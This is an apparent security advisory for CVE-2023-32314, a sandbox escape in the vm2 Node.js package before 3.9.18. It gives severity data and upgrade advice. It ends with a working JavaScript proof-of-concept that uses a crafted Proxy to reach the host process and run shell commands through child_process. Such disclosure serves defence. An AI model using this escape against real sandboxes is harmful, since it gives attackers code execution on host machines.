Sandbox Bypass Affecting vm2 package, versions <3.9.18
Snyk CVSS
- Attack Complexity: Low
- Confidentiality: High
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.54% (77th percentile)
- Snyk ID SNYK-JS-VM2-5537100
- published 16 May 2023
- disclosed 15 May 2023
- credit Takeshi Kaneko
Introduced: 15 May 2023
CVE-2023-32314
How to fix?
Upgrade vm2 to version 3.9.18 or higher.
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Sandbox Bypass by abusing an unexpected creation of a host object based on the maliciously crafted specification of Proxy.
Exploiting this vulnerability allows an attacker to gain remote code execution rights on the host running the sandbox via the Function constructor.
PoC
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo hacked").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked